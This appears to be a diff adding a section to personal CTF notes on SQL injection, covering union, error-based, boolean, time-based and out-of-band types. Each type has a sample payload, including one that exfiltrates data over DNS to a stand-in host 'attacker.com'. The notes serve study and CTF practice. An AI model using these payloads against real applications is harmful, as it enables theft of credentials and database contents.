Jacob-CL/CTFNotes/Methods/SQLInjection.md

     - Best for: Unstructured or rapidly changing data (social media posts, IoT sensors, content management)
     - Examples: MongoDB, Redis, Cassandra

+## 3 types of SQLi
+In-band - Where the attacker receives results directly in the same communication channel they used to send the attack.
+First choice when application shows database errors or results
+- Union based
+    - How it works: Uses the UNION operator to combine results from the original query with results from a malicious query
+    - Requirements: Both queries must have the same number of columns with compatible data types
+    - Process: Determine number of columns (ORDER BY or trial/error) --> Find which columns display data --> Extract information using UNION SELECT
+    - Example: `' UNION SELECT username,password FROM users-- -`
+    -
+    - Best case scenario: Full database dump possible
+- Error based
+    - How it works: Forces the database to produce error messages that reveal information
+    - Process: Craft queries that cause deliberate errors containing sensitive data
+    - Example: `' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -`
+    - Limitation: Only small amounts of data per error

+Blind - Where no direct output is returned, so attackers infer information based on application behavior.
+- Boolean (When application responds differently to true/false conditions)
+    - How it works: Sends queries that return True/False responses based on application behavior
+    - Process: Ask yes/no questions about the database
+    - Example:`' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a'-- -` If page loads normally = True, if error/different page = False
+    - Characteristics: Slow process, requires many requests
+- Time based (When no visible differences exist, but timing can be measured)
+    - How it works: Uses database functions that cause delays to infer True/False
+    - Process: Measure response times to determine if conditions are met
+    - Example: `' AND IF((SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a',SLEEP(5),0)-- -`
+    - Logic: If condition is true, page takes 5+ seconds to load
+    - Characteristics: Very slow, but works when no other feedback exists

+Out-of-band - where it uses different communication channels to receive results (separate from the attack channel).
+Used w2hen all other methods fail, or for stealth/speed in advanced scenarios.
+- How it works:
+    - Triggers database to make external connections (HTTP, DNS, SMB)
+    - Data is sent to attacker-controlled external server
+    - Useful when in-band methods don't work due to firewalls/filtering

+- Common techniques:
+    - DNS exfiltration: `' AND (SELECT LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\share')))-- -`
+    - HTTP requests: Database makes HTTP calls to attacker's server with data in URL
+    - Email: Some databases can send emails with extracted data

+- Requirements:
+    - Database must have network access
+    - Specific database functions enabled (like xp_cmdshell in SQL Server)
+    - Attacker needs external infrastructure to receive data

+Characteristics:

+Most complex to set up
+Often fastest for large data extraction
+Bypasses many filtering mechanisms
+Requires advanced database privileges

 # Resources

 # Good Examples